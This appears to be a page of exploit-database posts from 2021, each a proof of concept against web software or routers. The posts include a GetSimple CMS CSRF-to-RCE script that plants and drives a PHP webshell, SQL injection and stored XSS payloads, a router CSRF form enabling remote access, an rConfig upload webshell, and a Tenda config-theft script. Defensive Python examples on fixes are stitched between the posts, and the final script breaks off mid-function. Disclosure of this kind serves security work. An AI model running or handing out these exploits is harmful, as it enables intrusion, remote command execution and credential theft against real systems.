ISHACK AI BOT

All posts by ISHACK AI BOT

  1. # Exploit Title: GetSimple CMS My SMTP Contact Plugin 1.1.1 - CSRF to RCE
# Exploit Author: Bobby Cooke (boku)
# Date: 15/04/2021
# Vendor Homepage: http://get-simple.info
# Software Link: http://get-simple.info/extend/download.php?file=files/18274/1221/my-smtp-contact_1.1.1.zip&id=1221
# Vendor: NetExplorer
# Version: <= v1.1.1
# Tested against Server Host: Windows 10 Pro + XAMPP
# Tested against Client Browsers: Firefox
#
# About My SMTP Contact Plugin:
# An authenticated admin of the GetSimple CMS application, who has implemented the My SMTP Contact plugin, can navigate to the plugin's configuration page within the admin console and configure the settings for the SMTP form. The purpose of this plugin is to enable webpages of the CMS to host a contact form, where users of the application will be able to submit requests to the owner. These requests will be sent to the owner via SMTP email.
#
# CSRF Vulnerability Information:
# The GetSimple CMS application does not utilize the SameSite flag for the session cookie, and instead uses a CSRF token "nonce" to protect against cross-site attacks. Versions of the My SMTP Contact plugin v1.1.1 and before do not implement the CSRF token. The vendor was contacted March 28th 2021 and released v1.1.2 in response, which remediates this vulnerability by implementing the CSRF "nonce" token.
#
# PHP Code Injection Vulnerability Information:
# When the administrator configures the SMTP settings, the backend PHP code of the plugin injects the admin's user input into PHP code files. These user-supplied values are injected into PHP strings which use double quotes. Some features of PHP double-quote strings are that variables can be expanded within the strings, and variables enclosed in {} braces will attempt to evaluate complex expressions, resulting in code execution.
# The method in this proof of concept also overcomes the developer's attempt to sanitize the user input by using htmlspecialchars(), which removes "'<> and other dangerous characters. The developer received full disclosure of this vulnerability. A simple way to remediate this issue would be to inject the user-supplied input into single-quote strings instead of double-quote strings, as single-quote strings do not permit variable expansion and complex expression evaluation.
#
# Exploit Description:
# The My SMTP Contact v1.1.1 plugin for GetSimple CMS suffers from CSRF & PHP Code Injection vulnerabilities that, when chained together, allow remote unauthenticated attackers to achieve Remote Code Execution on the hosting server when an authenticated administrator visits a malicious third-party website.
# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
# CVSS Base Score: 9.6

import argparse
import requests
from http.server import BaseHTTPRequestHandler, HTTPServer
from colorama import (Fore as F, Back as B, Style as S)
from threading import Thread
from time import sleep

FT, FR, FG, FY, FB, FM, FC, ST, SD, SB = F.RESET, F.RED, F.GREEN, F.YELLOW, F.BLUE, F.MAGENTA, F.CYAN, S.RESET_ALL, S.DIM, S.BRIGHT


def bullet(char, color):
    C = FB if color == 'B' else FR if color == 'R' else FG
    return SB + C + '[' + ST + SB + char + SB + C + ']' + ST + ' '


info, err, ok = bullet('-', 'B'), bullet('-', 'R'), bullet('!', 'G')


class theTHREADER(object):
    # Runs the malicious CSRF web server in a background daemon thread
    def __init__(self, interval=1):
        self.interval = interval
        thread = Thread(target=self.run, args=())
        thread.daemon = True
        thread.start()

    def run(self):
        run()


def webshell(target):
    # Interactive loop against the non-blind webshell dropped by tryUploadWebshell()
    try:
        websh = "{}/webshell.php".format(target)
        term = "{}{}BOKU{} > {}".format(SB, FR, FB, ST)
        author = '{}{}]{}+++{}[{}========>{} Pwnage Provider : Bobby Cooke {}<========{}]{}+++{}[{}'.format(SB, FY, FR, FY, FT, FR, FT, FY, FR, FY, ST)
        print(author)
        while True:
            specialmove = input(term)
            command = {'FierceGodKick': specialmove}
            r = requests.post(websh, data=command, verify=False)
            status = r.status_code
            if status != 200:
                r.raise_for_status()
            response = r.text
            print(response)
    except:
        pass


# Plugin settings submitted by the CSRF form. The last field carries the PHP code
# injection: the plugin writes it into a double-quoted PHP string, so PHP's {$...[expr]}
# complex syntax evaluates shell_exec() every time the generated file is loaded.
CSRF_FIELDS = [
    ('act', 'addsettings'),
    ('m_smtp_c_language', 'en.php'),
    ('m_smtp_c_email_to', 'boku@0xboku'),
    ('m_smtp_c_smtp_or_standard', 'standard'),
    ('m_smtp_c_digital_captcha', 'on'),
    ('m_smtp_c_digitSalt', 'TLGfUrl3TyiaxOKwrg5d0exfBYKbHDwR'),
    ('m_smtp_c_agree_checkbox', 'on'),
    ('m_smtp_c_client_server', 'client_server'),
    ('m_smtp_c_window_msg', 'on'),
    ('m_smtp_c_default_css', 'on'),
    ('m_smtp_c_sender_name', 'boku'),
    ('m_smtp_c_subject', 'RCE'),
    ('m_smtp_c_email_from', 'boku@0xboku'),
    ('m_smtp_c_email_from_password', 'password123'),
    ('m_smtp_c_email_from_ssl', 'ssl://smtp.0xboku'),
    ('m_smtp_c_email_from_port', '777'),
    ('m_smtp_c_standard_email_from', 'boku@0xboku'),
    ('my_smtp_c_selected_dir', '62605e65e25ab30'),
    ('my_smtp_c_selected_name', 'asd'),
    ('m_smtp_c_alternative_fields', 'off'),
    ('m_smtp_c_qty_fields', '1'),
    ('m_smtp_c_limit_file_size', '1'),
    ('m_smtp_c_valid_file_format', 'jpeg'),
    ('m_smtp_c_arr_fields_Name[]', 'User name'),
    ('m_smtp_c_arr_fields_Name_ok[]', 'ok'),
    ('m_smtp_c_arr_tags_Name[]', '0'),
    ('m_smtp_c_arr_fields_Required[]', 'required'),
    ('m_smtp_c_arr_fields_Type[]', 'text'),
    ('m_smtp_c_arr_fields_Maxlength[]', '50'),
    ('m_smtp_c_arr_fields_Code[]', '{$m_smtp_c_qty_fields[shell_exec($_REQUEST[solarflare])]}'),
]


def generateCsrfPayload():
    payload = '<body><form action="' + target + '/admin/load.php?id=my-smtp-contact" method="POST">'
    for name, value in CSRF_FIELDS:
        payload += '<input type="hidden" name="{}" value="{}">'.format(name, value)
    payload += '<input type="submit" value="Submit request">'
    payload += '</form></body>'
    return payload


class CsrfHandler(BaseHTTPRequestHandler):
    # Serves the CSRF form to the victim admin (named so it does not shadow the colorama Style alias S)
    def do_GET(self):
        victim = self.client_address
        victim = "{}:{}".format(victim[0], victim[1])
        print("{} connected to Malicious CSRF Site!".format(victim))
        body = generateCsrfPayload().encode('utf-8')
        self.send_response(200)
        self.send_header('Content-Type', 'text/html')
        self.send_header('Content-Length', str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def run(server_class=HTTPServer, handler_class=CsrfHandler, port=80):
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    banner = '{}{}GetSimpleCMS My SMTP Contact Plugin v1.1.1 - CSRF to RCE{}'.format(SB, FR, ST)
    print(banner)
    print('Listening for Victims to connect..')
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    print('Stopping httpd...')


# Attempts to exploit the Blind RCE of the PHP Code Injection from the CSRF attack to upload a PHP webshell
def tryUploadWebshell(target, contact):
    try:
        blind = target + contact
        # The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for the Windows cmd prompt)
        webshUpload = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"}
        requests.post(url=blind, data=webshUpload, verify=False)
    except:
        pass


def checkWebshell(target):
    try:
        websh = "{}/webshell.php".format(target)
        capsule = {'FierceGodKick': 'pwnt?'}
        resp = requests.post(url=websh, data=capsule, verify=False)
        return resp.status_code
    except:
        pass


def argsetup():
    about = SB + FT + 'The My SMTP Contact v1.1.1 plugin for GetSimple CMS suffers from CSRF & PHP Code Injection vulnerabilities that, when chained together, allow remote unauthenticated attackers to achieve Remote Code Execution on the hosting server when an authenticated administrator visits a malicious third-party website. '
    about += FR + 'CVSS Base Score: 9.6 | '
    about += 'CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H' + ST
    parser = argparse.ArgumentParser(description=about)
    parser.add_argument('TargetSite', type=str, help='The routable domain name of the target site')
    parser.add_argument('SMTPContactPage', type=str, help='The path to the public page which implements the SMTP Contact form - Used for blind RCE')
    args = parser.parse_args()
    return args


if __name__ == '__main__':
    args = argsetup()
    target = args.TargetSite
    contact = args.SMTPContactPage
    threadshed = theTHREADER()
    pwnt = checkWebshell(target)
    if pwnt != 200:
        # Poll the contact page: once the admin has submitted the CSRF form, every
        # request to it runs shell_exec() on our 'solarflare' parameter
        while pwnt != 200:
            sleep(3)
            tryUploadWebshell(target, contact)
            sleep(2)
            pwnt = checkWebshell(target)
    print("{} Triggered the Blind RCE and caught a wild webshell!".format(ok))
    webshell(target)
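
The double-quote interpolation the post above relies on, modelled in Python as an added example (this is not code from the post or from the plugin): a model of htmlspecialchars() shows why that sanitizer leaves the injected expression intact, the two emitters reproduce the vulnerable double-quoted write and the single-quoted remediation the author proposes, and find_interpolation() is a check a responder can run over plugin-generated PHP data files, which should never contain interpolating literals. The variable and field names are taken from the CSRF form above; the regexes and the htmlspecialchars() model are this example's own assumptions.

```python
import re

# Constructed sample: the value the CSRF form above submits in m_smtp_c_arr_fields_Code[].
INJECTED_VALUE = "{$m_smtp_c_qty_fields[shell_exec($_REQUEST[solarflare])]}"


def php_htmlspecialchars(value: str) -> str:
    """Model of PHP htmlspecialchars() with ENT_QUOTES: it only encodes & " ' < >.
    Nothing here touches $, {, }, ( or [, so a PHP expression survives untouched."""
    return (value.replace("&", "&amp;").replace('"', "&quot;")
                 .replace("'", "&#039;").replace("<", "&lt;").replace(">", "&gt;"))


def emit_double_quoted(name: str, value: str) -> str:
    """Vulnerable pattern from the advisory: sanitized input written into a
    double-quoted PHP literal, which PHP still interpolates when the file loads."""
    return f'${name} = "{php_htmlspecialchars(value)}";'


def emit_single_quoted(name: str, value: str) -> str:
    """Remediation the advisory suggests: a single-quoted literal. Only the
    backslash and the quote itself need escaping; $ and {} are inert inside it."""
    escaped = value.replace("\\", "\\\\").replace("'", "\\'")
    return f"${name} = '{escaped}';"


# A double-quoted PHP string literal, allowing backslash escapes inside it (assumption:
# the scanned file is a generated data file, not arbitrary PHP with nested quoting).
DOUBLE_QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Constructs PHP expands inside double quotes: {$expr}, ${name} and a bare $name.
INTERPOLATION = re.compile(r"\{\$|\$\{|\$[A-Za-z_]")


def find_interpolation(php_source: str) -> list:
    """Return the bodies of double-quoted literals that PHP would interpolate.
    Any hit in a plugin-generated settings file is a sign of injected code."""
    return [m.group(1) for m in DOUBLE_QUOTED.finditer(php_source)
            if INTERPOLATION.search(m.group(1))]


if __name__ == "__main__":
    for emit in (emit_double_quoted, emit_single_quoted):
        line = emit("m_smtp_c_arr_fields_Code", INJECTED_VALUE)
        print(line, "->", "INTERPOLATED" if find_interpolation(line) else "inert")
```

The double-quoted emitter produces a line that still contains the full shell_exec() expression, and the scanner flags it; the single-quoted emitter produces a literal that PHP treats as plain text, and the scanner reports nothing.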
  2. # Exploit Title: Fast PHP Chat 1.3 - 'my_item_search' SQL Injection
# Date: 15/04/2021
# Exploit Author: Fatih Coskun
# Vendor Homepage: https://codecanyon.net/item/fast-php-chat-responsive-live-ajax-chat/10721076
# Version: 1.3
# Category: Webapps
# Tested on: Kali linux
# Description: The vulnerability allows an attacker to inject SQL commands from the search section through the 'my_item_search' parameter.

====================================================
# PoC:

SQLi:

POST /chat/edit.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/chat/edit.php
Cookie: PHPSESSID=9a04fe702b8ff82c1199590d7c286e1c; _ga=GA1.2.1275939122.1527132107; _gid=GA1.2.1709883568.1527132107
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

my_item_search=test&submit_search=Search

Parameter: my_item_search

Type: boolean-based blind
Demo: https://localhost/chat/edit.php
Payload: my_item_search=-2454' OR 6122=6122#&submit=Search

Type: error-based
Demo: https://localhost/chat/edit.php
Payload: my_item_search=test' AND (SELECT 3274 FROM(SELECT COUNT(*),CONCAT(0x71706a7071,(SELECT (ELT(3274=3274,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hbeW&submit=Search

Type: stacked queries
Demo: https://localhost/chat/edit.php
Payload: my_item_search=test';SELECT SLEEP(5)#&submit=Search

Type: AND/OR time-based blind
Demo: https://localhost/login-script-demo/users.php
Payload: my_item_search=test' OR SLEEP(5)-- mlod&submit=Search

Type: UNION query
Demo: https://localhost/chat/edit.php
Payload: my_item_search=test' UNION ALL SELECT NULL,CONCAT(0x71706a7071,0x4c5a6241667667676e4f6658775348795675704b557871675a5542646273574e5359776668534a71,0x7162716b71),NULL,NULL,NULL,NULL#&submit=Search
====================================================
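
An added example, not part of the post above and not the Fast PHP Chat code: the string-built search query that produces a 'my_item_search' injection of this shape, next to its parameterized fix, plus the oracle sqlmap's boolean-based check reduces to (a TRUE tautology and a FALSE tautology must behave differently, and the TRUE one must return more than an innocent search). The table, rows and search functions are constructed for the example; SQLite is used in place of MySQL, so the page's '#' comment terminator is replaced by the '-- ' form SQLite understands.

```python
import sqlite3

# Constructed sample data standing in for the chat application's searchable items.
ITEMS = [("coffee mug",), ("desk lamp",), ("usb cable",)]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO items (name) VALUES (?)", ITEMS)
    return db


def search_vulnerable(db, my_item_search: str) -> list:
    """String-built query: the pattern behind the 'my_item_search' injection."""
    sql = "SELECT name FROM items WHERE name LIKE '%" + my_item_search + "%'"
    return [row[0] for row in db.execute(sql)]


def search_parameterized(db, my_item_search: str) -> list:
    """Fix: the value travels as a bound parameter, never as SQL text, so the
    quote and the comment marker are just characters in a LIKE pattern."""
    sql = "SELECT name FROM items WHERE name LIKE ?"
    return [row[0] for row in db.execute(sql, ("%" + my_item_search + "%",))]


# The page's boolean-based payload with MySQL's '#' replaced by '-- ' for SQLite
# (sqlmap's "-- hbeW" suffix on the other payloads does the same job).
TRUE_PAYLOAD = "-2454' OR 6122=6122-- "
FALSE_PAYLOAD = "-2454' OR 6122=6123-- "


def confirm_boolean_blind(search, db) -> bool:
    """Boolean-based blind oracle: TRUE and FALSE tautologies must differ, and the
    TRUE one must return rows that the unmodified search term would not."""
    try:
        baseline = search(db, "-2454")
        true_rows = search(db, TRUE_PAYLOAD)
        false_rows = search(db, FALSE_PAYLOAD)
    except sqlite3.Error:
        return False  # a syntax error means the quote never broke out of the literal
    return true_rows != false_rows and len(true_rows) > len(baseline)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", confirm_boolean_blind(search_vulnerable, db))
    print("parameterized:", confirm_boolean_blind(search_parameterized, db))
```

Against the string-built function the TRUE payload dumps every row and the oracle returns True; against the parameterized one both payloads are treated as a literal pattern, return nothing, and the oracle returns False.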
  3. # Exploit Title: Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)
# Date: 14/04/2021
# Exploit Author: Rodolfo Mariano
# Version: Firmware V02.03.01.45_pt
# CVE: CVE-2021-31152
# Exploit Code:

<html>
<body>
<form action="http://192.168.0.1/goform/setSysTools" method="POST">
<input name="module4" value="remoteWeb" type="hidden">
<input name="remoteWebType" value="any" type="hidden">
<input name="remoteWebIP" value="" type="hidden">
<input name="remoteWebPort" value="8888" type="hidden">
<input type="submit" value="Submit request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
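
The server-side check that both CSRF posts above lack (the router form here, and the plugin form in post 1 that GetSimple's own "nonce" would have covered), written as an added example rather than anything from either product: a state-changing handler should require same-origin evidence twice, from the Origin/Referer header and from a per-session token compared in constant time. The site origin is the router address from the PoC; the Session class, header dictionary and field name csrf_token are this example's assumptions.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://192.168.0.1"   # the router address from the PoC form above


class Session:
    """Server-side session; the anti-CSRF token is bound to it, not to a cookie alone."""
    def __init__(self):
        self.csrf_token = secrets.token_hex(16)


def origin_of(headers: dict):
    """Browsers send Origin on cross-site POSTs; some send only Referer."""
    value = headers.get("Origin") or headers.get("Referer")
    if not value:
        return None
    parts = urlsplit(value)
    return f"{parts.scheme}://{parts.netloc}"


def csrf_check(headers: dict, form: dict, session: Session):
    """Return (accepted, reason). Rejects unless the request proves same-origin
    intent by source origin AND by the per-session token; either check alone has
    gaps (Origin is absent in some clients, SameSite cookies are not universal)."""
    origin = origin_of(headers)
    if origin is None or origin != SITE_ORIGIN:
        return False, "origin mismatch"
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, session.csrf_token):
        return False, "bad token"
    return True, "ok"


if __name__ == "__main__":
    s = Session()
    # The auto-submitting form above arrives with the attacker page's Origin and no token
    print(csrf_check({"Origin": "http://attacker.example"},
                     {"module4": "remoteWeb", "remoteWebPort": "8888"}, s))
    print(csrf_check({"Referer": SITE_ORIGIN + "/tools.html"}, {"csrf_token": s.csrf_token}, s))
```

Applied to the PoC, the forged POST fails on origin before the token is even consulted; a same-origin POST without the token still fails, and only the legitimate form that carries the session's token passes.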
  4. # Exploit Title: WordPress Plugin RSS for Yandex Turbo 1.29 - Stored Cross-Site Scripting (XSS)
# Date: 17/04/2021
# Exploit Author: Himamshu Dilip Kulkarni
# Software Link: https://wordpress.org/plugins/rss-for-yandex-turbo/
# Version: 1.29
# Tested on: Windows

# Steps to reproduce the vulnerability:
1. Install WordPress 5.6
2. Install and activate the "RSS for Yandex Turbo" plugin.
3. Navigate to Settings >> Яндекс.Турбо (Yandex.Turbo) >> Счетчики (Counters), enter data into all six user input fields and submit the request.
4. Capture the request in Burp Suite and append the following JavaScript payloads (one payload per parameter):
"+onmouseover="alert(1)
"+onmouseover="alert(2)
"+onmouseover="alert(3)
"+onmouseover="alert(4)
"+onmouseover="alert(5)
"+onmouseover="alert(6)
5. You will observe that the payloads are successfully stored in the database, and when you move the mouse cursor over these fields the JavaScript payloads execute and we get a pop-up.
  5. # Exploit Title: BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 04/07/2021
# Exploit Author: Ömer Hasan Durmuş
# Vendor Homepage: https://blackcat-cms.org/
# Software Link: https://blackcat-cms.org/page/download.php
# Version: BlackCat CMS - 1.3.6

Step 1: Log in to the admin account at http://TARGET/backend/start/index.php
Step 2: Then click on "Addons"
Step 3: Click on "Create new"
Step 4: Input "<script>alert(1)</script>" in the field "Module / language name"
Step 5: Update or visit the new page.

Step 1: Log in to the admin account at http://TARGET/backend/start/index.php
Step 2: Then click on "Access"
Step 3: Click on "Manage groups"
Step 4: Input "<script>alert(1)</script>" in the field "Group name" and click "Add group"
Step 5: Update or visit the new page.
  6. # Exploit Title: RemoteClinic 2 - 'Multiple' Cross-Site Scripting (XSS)
# Exploit Author: nu11secur1ty
# Debug: g3ck0dr1v3r
# Date: 04/21/2021
# Vendor Homepage: https://remoteclinic.io/
# Software Link: https://github.com/remoteclinic/RemoteClinic
# CVE: CVE-2021-30044

[+] Exploit Source: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-30044

[Exploit Program Code]

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug: g3ck0dr1v3r
# CVE-2021-30044
from selenium import webdriver
from selenium.webdriver.common.by import By
import time

# enter the link to the website you want to automate login.
website_link = "http://localhost/RemoteClinic/login/"
# enter your login username
username = "[email protected]"
# enter your login password
password = "remoteclinic"
# enter the element for username input field
element_for_username = "user_id"
# enter the element for password input field
element_for_password = "password"
# enter the element for submit button
element_for_submit = "submit"

# Start the browser
browser = webdriver.Chrome()  # uncomment this line for Chrome users
# browser = webdriver.Firefox()  # uncomment this line for Firefox users
# browser = webdriver.Safari()  # for macOS users [for others use Chrome via chromedriver]

# Open the login page
browser.get(website_link)

# Run...
try:
    # Selenium 4 API: find_element(By.NAME, ...) replaces the removed find_element_by_name()
    username_element = browser.find_element(By.NAME, element_for_username)
    username_element.send_keys(username)
    password_element = browser.find_element(By.NAME, element_for_password)
    password_element.send_keys(password)

    ### Login
    signInButton = browser.find_element(By.NAME, element_for_submit)
    signInButton.click()

    ### Exploit
    element_for_natrutvanie = "submit"
    browser.get("http://localhost/RemoteClinic/staff/register.php")

    ### Inner text...
    browser.execute_script("document.querySelector('[name=\"first_name\"]').value = '<img src=1 onerror=alert(`Please_fix_it`)>'")
    browser.execute_script("document.querySelector('[name=\"last_name\"]').value = '<img src=1 onerror=alert(`Please_fix_it`)>'")
    browser.execute_script("document.querySelector('[name=\"userid\"]').value = '[email protected]'")
    browser.execute_script("document.querySelector('[name=\"passkey\"]').value = 'password'")
    browser.execute_script("document.querySelector('[name=\"contact\"]').value = '123456789'")
    browser.execute_script("document.querySelector('[name=\"mobile\"]').value = '12345678910'")
    browser.execute_script("document.querySelector('[name=\"skype\"]').value = 'nu11secur1ty'")
    browser.execute_script("document.querySelector('[name=\"address\"]').value = 'Kurec A 31'")
    browser.find_element(By.NAME, 'image').send_keys("C:\\Users\\nu11secur1ty\\Desktop\\CVE\\CVE-2021-30044\\nu11secur1ty.png")
    time.sleep(5)

    # Submit exploit
    signInButton = browser.find_element(By.NAME, element_for_natrutvanie)
    signInButton.click()

    # Sign out; test the stored payload afterwards
    time.sleep(1)
    browser.get("http://localhost/RemoteClinic/login/signout.php")
    browser.close()
    print("payload is deployed...\n")
except Exception:
    #### This exception occurs if the elements are not found in the webpage.
    print("Some error occurred :(")
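
The three stored-XSS posts above (and the emailAddress case in post 10) all come down to one missing step: contextual output encoding. This added example, not code from any of those projects, renders a value into a double-quoted attribute and into element text the way the vulnerable plugins do, next to the html.escape()-based fix, and parses the result with html.parser to list every on* handler a browser would see. The Yandex Turbo payload is shown on the page form-encoded, so its '+' is decoded to a space first; the field names and the render functions are this example's own assumptions.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# Constructed payloads taken from the posts above. The first is form-encoded on the
# page ('+' is a space once the server decodes the request body).
ATTR_PAYLOAD = unquote_plus('"+onmouseover="alert(1)')
TAG_PAYLOAD = "<img src=1 onerror=alert(`Please_fix_it`)>"


def render_vulnerable(counter: str, first_name: str) -> str:
    """Raw interpolation into an attribute value and into text, as the plugins do."""
    return f'<input name="counter" value="{counter}"><p>{first_name}</p>'


def render_escaped(counter: str, first_name: str) -> str:
    """Contextual output encoding: html.escape(quote=True) turns & < > " ' into
    entities, which keeps the attribute closed and neutralises the <img> tag."""
    return (f'<input name="counter" value="{html.escape(counter, quote=True)}">'
            f'<p>{html.escape(first_name)}</p>')


class HandlerFinder(HTMLParser):
    """Records every on* attribute the browser would register as an event handler."""
    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower().startswith("on"):
                self.handlers.append((tag, name, value))


def injected_handlers(markup: str) -> list:
    """Parse markup the way a browser would and return (tag, attribute, value)
    for each event handler; a non-empty list means the input became behaviour."""
    finder = HandlerFinder()
    finder.feed(markup)
    finder.close()
    return finder.handlers


if __name__ == "__main__":
    print(injected_handlers(render_vulnerable(ATTR_PAYLOAD, TAG_PAYLOAD)))
    print(injected_handlers(render_escaped(ATTR_PAYLOAD, TAG_PAYLOAD)))
```

With raw interpolation the decoded payload closes the value attribute and adds onmouseover to the input, and the name field becomes an img element with an onerror handler; with escaping both stay inert string content and the parser finds no handlers at all.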
  7. # Exploit Title: rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (2)
# Exploit Author: Vishwaraj Bhattrai
# Date: 18/04/2021
# Vendor Homepage: https://www.rconfig.com/
# Software Link: https://www.rconfig.com/
# Vendor: rConfig
# Version: <= v3.9.6
# Tested against Server Host: Linux+XAMPP

import requests
import sys
from urllib.parse import quote

s = requests.Session()
host = sys.argv[1]  # Enter the hostname
cmd = sys.argv[2]   # Enter the command

BOUNDARY = "---------------------------3835647072299295753759313500"
USER_AGENT = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0"


def exec_cmd(cmd, host):
    print("[+]Executing command")
    # The uploaded shell is stored under its uploaded name (x.php) and reads $_GET['x']
    path = "https://%s/images/vendor/x.php?x=%s" % (host, quote(cmd))
    response = s.get(path)
    print(response.text)
    print("\n[+]You can access shell via below path")
    print(path)


def file_upload(cmd, host):
    print("[+]Bypassing file upload")
    burp0_url = "https://" + host + ":443/lib/crud/vendors.crud.php"
    burp0_headers = {
        "User-Agent": USER_AGENT,
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "multipart/form-data; boundary=" + BOUNDARY,
        "Origin": "https://demo.rconfig.com",
        "Connection": "close",
        "Referer": "https://demo.rconfig.com/vendors.php",
        "Upgrade-Insecure-Requests": "1",
    }
    # The vendor logo part declares image/gif but carries a PHP file with a .php name
    burp0_data = (
        "--" + BOUNDARY + "\r\nContent-Disposition: form-data; name=\"vendorName\"\r\n\r\nCisco2\r\n"
        "--" + BOUNDARY + "\r\nContent-Disposition: form-data; name=\"vendorLogo\"; filename=\"x.php\"\r\n"
        "Content-Type: image/gif\r\n\r\n<?php $cmd=$_GET['x'];system($cmd);?>\n\r\n"
        "--" + BOUNDARY + "\r\nContent-Disposition: form-data; name=\"add\"\r\n\r\nadd\r\n"
        "--" + BOUNDARY + "\r\nContent-Disposition: form-data; name=\"editid\"\r\n\r\n\r\n"
        "--" + BOUNDARY + "--\r\n"
    )
    s.post(burp0_url, headers=burp0_headers, data=burp0_data)
    exec_cmd(cmd, host)


def login(host, cmd):
    print("[+]Logging in")
    burp0_url = "https://" + host + ":443/lib/crud/userprocess.php"
    burp0_headers = {
        "User-Agent": USER_AGENT,
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": "https://demo.rconfig.com",
        "Connection": "close",
        "Referer": "https://demo.rconfig.com/login.php",
        "Upgrade-Insecure-Requests": "1",
    }
    burp0_data = {"user": "admin", "pass": "admin", "sublogin": "1"}  # Use a valid set of credentials; default is set to admin/admin
    response = s.post(burp0_url, headers=burp0_headers, data=burp0_data)  # the session keeps the PHPSESSID cookie for the upload
    file_upload(cmd, host)


login(host, cmd)
  8. # Exploit Title: Tenda D151 & D301 - Configuration Download (Unauthenticated)
# Date: 19-04-2021
# Exploit Author: BenChaliah
# Author link: https://github.com/BenChaliah
# Vendor Homepage: https://www.tendacn.com
# Software Link: https://www.tendacn.com/us/download/detail-3331.html
# Versions:
# - D301 1.2.11.2_EN
# - D301 V2.0 50.22.1.8_EN
# - D151 V2.0 50.21.1.5_EN
#
# --- Description ---
#
# This exploit allows the download of the current router config, including the admin login, just by requesting {IP}/goform/getimage.
# You can also activate the telnet service by requesting /goform/telnet. The telnet activation issue exists in many other Tenda devices too.
#
# --- Proof of concept ---
# (ported from the author's Python 2 script to Python 3; bytes handling is the only change)

import struct
import sys
import requests
import base64

FETCH_CODE = b"\x80\x0f\x07\xe7\x83i\xb0@v2\x9c\x8ef\x93y\xb8z"
ADMIN_LOG_CFG = {b'AdminPassword': 'admin', b'SupportPassword': 'support'}
CLEAR_CODE = 256
END_OF_CODE = CLEAR_CODE + 1
MIN_WIDTH = 8
DEFAULT_MIN_BITS = MIN_WIDTH + 1
DEFAULT_MAX_BITS = 12


def cmsDecoder(compressed_cfg):
    # Variable-width LZW decoder (codes grow from 9 bits, MSB-first bit packing,
    # 256 = clear, 257 = end) for the compressed config blob the router returns
    _cp_dict = {pt: bytes([pt]) for pt in range(256)}
    _cp_dict[CLEAR_CODE] = CLEAR_CODE
    _cp_dict[END_OF_CODE] = END_OF_CODE
    prefix, offset, ignore = None, 0, 0
    codepoints_arr, bits = [], []
    init_csize = len(_cp_dict)
    codesize = init_csize
    minwidth = MIN_WIDTH
    while (1 << minwidth) < codesize:
        minwidth = minwidth + 1
    pointwidth = minwidth
    # Unpack the byte stream into bits, most significant bit first
    buts_arr = []
    for value in compressed_cfg:  # iterating bytes yields ints
        for bitindex in range(7, -1, -1):
            buts_arr.append(1 & (value >> bitindex))
    # Regroup the bits into codes whose width grows as the dictionary fills
    for nextbit in buts_arr:
        offset = (offset + 1) % 8
        if ignore > 0:
            ignore = ignore - 1
            continue
        bits.append(nextbit)
        if len(bits) == pointwidth:
            cp_int = 0
            for bit_index, bit in enumerate(reversed(bits)):
                if bit:
                    cp_int |= (1 << bit_index)
            bits = []
            codepoints_arr.append(cp_int)
            codesize = codesize + 1
            if cp_int in (CLEAR_CODE, END_OF_CODE):
                codesize = init_csize
                pointwidth = minwidth
            else:
                while codesize >= (2 ** pointwidth):
                    pointwidth = pointwidth + 1
            if cp_int == END_OF_CODE:
                ignore = (8 - offset) % 8  # skip the padding up to the next byte boundary
    # Expand the codes back into bytes
    decoded = bytearray()
    for cp_int in codepoints_arr:
        suffix = b""
        if cp_int == CLEAR_CODE:
            _cp_dict = {pt: bytes([pt]) for pt in range(256)}
            _cp_dict[CLEAR_CODE] = CLEAR_CODE
            _cp_dict[END_OF_CODE] = END_OF_CODE
            prefix = None
        elif cp_int != END_OF_CODE:
            if cp_int in _cp_dict:
                suffix = _cp_dict[cp_int]
                if prefix is not None:
                    _cp_dict[len(_cp_dict)] = prefix + suffix[:1]
            else:
                suffix = prefix + prefix[:1]
                _cp_dict[len(_cp_dict)] = suffix
            prefix = suffix
        decoded += suffix
    return bytes(decoded)


def exploit(ip):
    print("[!] Downloading config")
    try:
        r = requests.get("http://{}/goform/getimage".format(ip))
    except Exception:
        print("[-] Failed to download the config, the target may not be vulnerable")
        return -1
    BIN_CONTENT = r.content
